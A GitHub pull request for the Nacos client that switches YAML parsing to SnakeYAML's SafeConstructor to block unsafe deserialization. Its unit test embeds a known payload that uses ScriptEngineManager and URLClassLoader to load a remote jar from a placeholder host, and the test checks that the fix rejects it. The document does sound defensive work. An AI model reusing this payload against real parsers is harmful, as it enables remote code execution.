### PR TITLE
Use SafeConstructor to parse yaml configuration 

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -16,3 +16,4 @@ work
 test/logs
 derby.log
 yarn.lock
+.flattened-pom.xml

--- a/client/src/main/java/com/alibaba/nacos/client/config/impl/YmlChangeParser.java
+++ b/client/src/main/java/com/alibaba/nacos/client/config/impl/YmlChangeParser.java
@@ -17,8 +17,12 @@
 package com.alibaba.nacos.client.config.impl;
 
 import com.alibaba.nacos.api.config.ConfigChangeItem;
+import com.alibaba.nacos.api.exception.NacosException;
+import com.alibaba.nacos.api.exception.runtime.NacosRuntimeException;
 import com.alibaba.nacos.common.utils.StringUtils;
 import org.yaml.snakeyaml.Yaml;
+import org.yaml.snakeyaml.constructor.ConstructorException;
+import org.yaml.snakeyaml.constructor.SafeConstructor;
 
 import java.util.Collection;
 import java.util.Collections;
@@ -33,6 +37,8 @@ import java.util.Map;
  */
 public class YmlChangeParser extends AbstractConfigChangeParser {
     
+    private static final String INVALID_CONSTRUCTOR_ERROR_INFO = "could not determine a constructor for the tag";
+    
     public YmlChangeParser() {
         super("yaml");
     }
@@ -41,20 +47,34 @@ public class YmlChangeParser extends AbstractConfigChangeParser {
     public Map<String, ConfigChangeItem> doParse(String oldContent, String newContent, String type) {
         Map<String, Object> oldMap = Collections.emptyMap();
         Map<String, Object> newMap = Collections.emptyMap();
-        
-        if (StringUtils.isNotBlank(oldContent)) {
-            oldMap = (new Yaml()).load(oldContent);
-            oldMap = getFlattenedMap(oldMap);
-        }
-        if (StringUtils.isNotBlank(newContent)) {
-            newMap = (new Yaml()).load(newContent);
-            newMap = getFlattenedMap(newMap);
+        try {
+            Yaml yaml = new Yaml(new SafeConstructor());
+            if (StringUtils.isNotBlank(oldContent)) {
+                oldMap = yaml.load(oldContent);
+                oldMap = getFlattenedMap(oldMap);
+            }
+            if (StringUtils.isNotBlank(newContent)) {
+                newMap = yaml.load(newContent);
+                newMap = getFlattenedMap(newMap);
+            }
+        } catch (ConstructorException e) {
+            handleYamlException(e);
         }
         
         return filterChangeData(oldMap, newMap);
     }
     
-    private final Map<String, Object> getFlattenedMap(Map<String, Object> source) {
+    private void handleYamlException(ConstructorException e) {
+        if (e.getMessage().startsWith(INVALID_CONSTRUCTOR_ERROR_INFO)) {
+            throw new NacosRuntimeException(NacosException.INVALID_PARAM,
+                    "AbstractConfigChangeListener only support basic java data type for yaml. If you want to listen "
+                            + "key changes for custom classes, please use `Listener` to listener whole yaml configuration and parse it by yourself.",
+                    e);
+        }
+        throw e;
+    }
+    
+    private Map<String, Object> getFlattenedMap(Map<String, Object> source) {
         Map<String, Object> result = new LinkedHashMap<String, Object>(128);
         buildFlattenedMap(result, source, null);
         return result;

--- a/client/src/test/java/com/alibaba/nacos/client/config/listener/impl/YmlChangeParserTest.java
+++ b/client/src/test/java/com/alibaba/nacos/client/config/listener/impl/YmlChangeParserTest.java
@@ -17,6 +17,7 @@
 package com.alibaba.nacos.client.config.listener.impl;
 
 import com.alibaba.nacos.api.config.ConfigChangeItem;
+import com.alibaba.nacos.api.exception.runtime.NacosRuntimeException;
 import com.alibaba.nacos.client.config.impl.YmlChangeParser;
 import org.junit.Assert;
 import org.junit.Test;
@@ -54,6 +55,13 @@ public class YmlChangeParserTest {
         Map<String, ConfigChangeItem> map = parser.doParse("app:\n  name: rocketMQ", "app:\n  name: nacos", type);
         Assert.assertEquals("rocketMQ", map.get("app.name").getOldValue());
         Assert.assertEquals("nacos", map.get("app.name").getNewValue());
+    }
+    
+    @Test(expected = NacosRuntimeException.class)
+    public void testChangeInvalidKey() {
+        parser.doParse("anykey:\n  a", "anykey: !!javax.script.ScriptEngineManager [\n"
+                + "  !!java.net.URLClassLoader [[\n"
+                + "    !!java.net.URL [\"http://[yourhost]:[port]/yaml-payload.jar\"]\n" + "  ]]\n" + "]", type);
     }
 }
 


### PR DESCRIPTION

When users' use AbstractConfigChangeListener to listen config change key, nacos-client will parse yaml. But there are no use SafeConstructor.

This PR is to use SafeConstructor to parse the yaml and find out the changed key. Then callback users listener.

Now, spring cloud, dubbo, and springboot all not use `AbstractConfigChangeListener` to listen config changes. So It **will not** affect users for spring cloud, dubbo, and springboot.

Only affect those users using nacos-client directly and use `AbstractConfigChangeListener` to listener change keys in yaml configurations.

## What is the purpose of the change

XXXXX

## Brief changelog

XX

## Verifying this change

XXXX

Follow this checklist to help us incorporate your contribution quickly and easily:

* [ ] Make sure there is a Github issue filed for the change (usually before you start working on it). Trivial changes like typos do not require a Github issue. Your pull request should address just this issue, without pulling in other changes - one PR resolves one issue.
* [ ] Format the pull request title like `[ISSUE #123] Fix UnknownException when host config not exist`. Each commit in the pull request should have a meaningful subject line and body.
* [ ] Write a pull request description that is detailed enough to understand what the pull request does, how, and why.
* [ ] Write necessary unit-test to verify your logic correction, more mock a little better when cross module dependency exist. If the new feature or significant change is committed, please remember to add integration-test in [test module](https://github.com/alibaba/nacos/tree/master/test).
* [ ] Run `mvn -B clean package apache-rat:check findbugs:findbugs -Dmaven.test.skip=true` to make sure basic checks pass. Run `mvn clean install -DskipITs` to make sure unit-test pass. Run `mvn clean test-compile failsafe:integration-test`  to make sure integration-test pass.

